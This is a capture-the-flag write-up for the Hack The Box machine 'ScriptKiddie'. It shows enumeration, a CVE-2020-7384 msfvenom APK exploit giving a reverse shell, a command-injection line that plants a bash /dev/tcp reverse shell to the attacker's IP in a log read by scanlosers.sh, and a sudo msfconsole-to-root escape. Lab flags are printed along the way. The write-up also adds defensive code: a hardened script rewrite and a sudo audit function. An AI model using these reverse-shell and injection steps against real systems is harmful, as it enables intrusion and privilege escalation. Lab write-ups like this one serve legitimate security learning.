# HTB ScriptKiddie done

## ScriptKiddie

### Notes

**OS:** Linux

**Technology:** Werkzeug httpd 0.16.1 (Python 3.8.5)

**IP Address:** 10.129.224.168

**Open ports:**

```
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
```

**Users and pass:**

### Nmap
```
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.224.168_nmap 10.129.224.168 ; cat 10.129.224.168_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 12:20 CEST
Nmap scan report for 10.129.224.168
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
```
### Ffuf: http://10.129.224.168:5000

```
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ ffuf -u http://10.129.224.168:5000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.224.168_5000_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.224.168:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git
 :: Output file      : 10.129.224.168_5000_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [163752/163752] :: Job [1/1] :: 297 req/sec :: Duration: [0:10:07] :: Errors: 0 ::
```
### Exploit: CVE-2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection
#### Create revshell payload

```
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384]
└─$ ./CVE-2020-7384.sh
CVE-2020-7384
Enter a name for the exploit file (Press enter for default: shell):
Enter the LHOST (Press enter for default: 10.10.14.59):
Enter the LPORT (Press enter for default: 4444):
Select the payload type (press enter for default: bash):
1. bash
2. nc
3. python
4. python3
select: 1
APK created at: /home/kali/Desktop/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384/shell.apk
To use the exploit on the vulnerable machine, run:
msfvenom -x shell.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null
```
#### Upload revshell

```
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 56674
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$
```
#### Read flag: user.txt

```
kid@scriptkiddie:~/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/kid/user.txt
kid@scriptkiddie:~/html$ cat /home/kid/user.txt
cat /home/kid/user.txt
0658779559c0e3e75b39bd9692d7716e
kid@scriptkiddie:~/html$
```
### Read file: /home/pwn/scanlosers.sh

Command injection is possible here: `cut -d' ' -f3-` keeps everything from the third space-separated field to the end of the line, and that string is interpolated unquoted into `sh -c "nmap ... ${ip} ..."`. So whatever follows the first two fields of a line in `/home/kid/logs/hackers` (a file the `kid` user can write) is executed as shell by the `pwn` user.

---

```
kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
cat scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
```
#### Create revshell

```
kid@scriptkiddie:~/logs$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.59/5000 0>&1' # ." > hackers
```

---

```
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 5000
listening on [any] 5000 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 59932
bash: cannot set terminal process group (806): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$
```
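The root cause above is `cut -f3-` handing the remainder of the line to `sh -c`. The following hardened rewrite is an added example, not the box's script or anything from this writeup: it keeps only field 3, validates it as a dotted-quad IPv4 address, and runs nmap with an argument list instead of a command string, so no part of the log is ever parsed as shell. The function names (`is_ipv4`, `scan_targets`), the log/recon-directory parameters and the dry-run mode are assumptions for illustration; the log format (two fields followed by the IP) is inferred from the original `cut -d' ' -f3-`.

```bash
#!/bin/sh
# Added example, not the box's script: a hardened rewrite of the scanlosers.sh
# pipeline. Assumes each log line is "<field> <field> <ip>", as the original
# `cut -d' ' -f3-` implies. Log path and recon dir are parameters so the
# function can be exercised against a constructed file.

# Accept only a dotted-quad IPv4 address: four decimal octets, each 0-255.
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # non-digit chars, leading/trailing/double dots
    esac
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Take field 3 only (never `-f3-`), dedupe, validate, and invoke nmap with an
# argument list rather than a string fed to `sh -c`. Rejected entries go to
# stderr; accepted ones are scanned (mode "run") or printed (mode "dry").
# Usage: scan_targets <log> <recon_dir> [run|dry]    (default: dry)
scan_targets() {
    log=$1; recon=$2; mode=${3:-dry}
    [ -r "$log" ] || return 2
    # -s drops lines that have no delimiter at all instead of passing them whole
    cut -s -d' ' -f3 "$log" | sort -u | {
        accepted=0; rejected=0
        while read -r ip; do
            [ -n "$ip" ] || continue
            if ! is_ipv4 "$ip"; then
                rejected=$((rejected + 1))
                printf 'REJECT %s\n' "$ip" >&2
                continue
            fi
            accepted=$((accepted + 1))
            if [ "$mode" = run ]; then
                # "$ip" is a single argv element; metacharacters cannot break out
                nmap --top-ports 10 -oN "$recon/$ip.nmap" "$ip" >/dev/null 2>&1 &
            else
                printf 'SCAN %s -> %s/%s.nmap\n' "$ip" "$recon" "$ip"
            fi
        done
        echo "accepted=$accepted rejected=$rejected"
    }
}
```

With a constructed log containing the injection line from this writeup (`x x x 127.0.0.1; bash ...`), field 3 is just `x`, which fails validation and is reported instead of executed; an entry such as `127.0.0.1;id` in the IP field is rejected by the character check before anything is run.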
### sudo -l

```
pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole
```
### Privilege Escalation:

#### GTFOBins - msfconsole

```
pwn@scriptkiddie:~$ sudo msfconsole
sudo msfconsole
 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|

       =[ metasploit v6.0.9-dev                          ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object
system("bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>> system("bash")
id
uid=0(root) gid=0(root) groups=0(root)
```
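The escalation works because the one command `pwn` may run as root without a password embeds a Ruby console, so `sudo -l` output like the one above is the first thing to audit. As an added defender-side check that is not part of this writeup, `audit_sudo_l` parses saved `sudo -l` output, reports every NOPASSWD rule that runs as root (or ALL), and tags commands whose basename is a known interactive console or interpreter. The function name is hypothetical, the interpreter list is a small assumption drawn from the kind of binaries GTFOBins catalogues, and the sample rules other than the msfconsole line are constructed.

```bash
#!/bin/sh
# Added example (not from the writeup): report NOPASSWD-as-root rules in
# saved `sudo -l` output. Usage: audit_sudo_l <file>
# The "shell-capable" list below is an assumption for illustration.
audit_sudo_l() {
    awk -v shellcap="msfconsole irb ruby python python3 perl vim less" '
        BEGIN { n = split(shellcap, tmp, " "); for (i = 1; i <= n; i++) risky[tmp[i]] = 1 }
        # Rules follow the "may run the following commands" line; ignore Defaults.
        /may run the following commands/ { rules = 1; next }
        !rules { next }
        # Rule lines look like: (runas) [NOPASSWD:] /path/cmd [args][, /path/cmd2 ...]
        /^[ \t]*\(/ {
            line = $0
            sub(/^[ \t]*/, "", line)
            match(line, /^\([^)]*\)/)
            runas = substr(line, 2, RLENGTH - 2)
            rest  = substr(line, RLENGTH + 1)
            nopass = (rest ~ /NOPASSWD:/)
            sub(/^[ \t]*(NOPASSWD|PASSWD):[ \t]*/, "", rest)
            # Only password-less rules that can run as root (or ALL) are findings.
            if (!nopass || runas !~ /^(root|ALL)([ \t]*:.*)?$/) next
            m = split(rest, cmds, /,[ \t]*/)
            for (i = 1; i <= m; i++) {
                split(cmds[i], parts, " "); bin = parts[1]; sub(/.*\//, "", bin)
                tag = (bin in risky) ? " shell-capable" : ""
                printf "NOPASSWD-ROOT (%s) %s%s\n", runas, cmds[i], tag
                count++
            }
        }
        END { printf "findings=%d\n", count + 0 }
    ' "$1"
}
```

Run against the output captured on this box the only finding is `NOPASSWD-ROOT (root) /opt/metasploit-framework-6.0.9/msfconsole shell-capable`; a rule that requires a password (no `NOPASSWD:`) or runs as a non-root user is not reported.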
#### Read flag: root.txt

```
id
uid=0(root) gid=0(root) groups=0(root)
cd /root/
ls -a
.
..
.bash_history
.bashrc
.cache
.gem
.lesshst
.local
.msf4
.profile
.selected_editor
.viminfo
root.txt
snap
cat root.txt
41380278d6f60ccbfff7b4637e017ec9
```
### References

- [CVE-2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection](https://www.exploit-db.com/exploits/49491)
- [CVE-2020-7384](https://github.com/CarsonShaffer/CVE-2020-7384)
### Lessons Learned

### Tags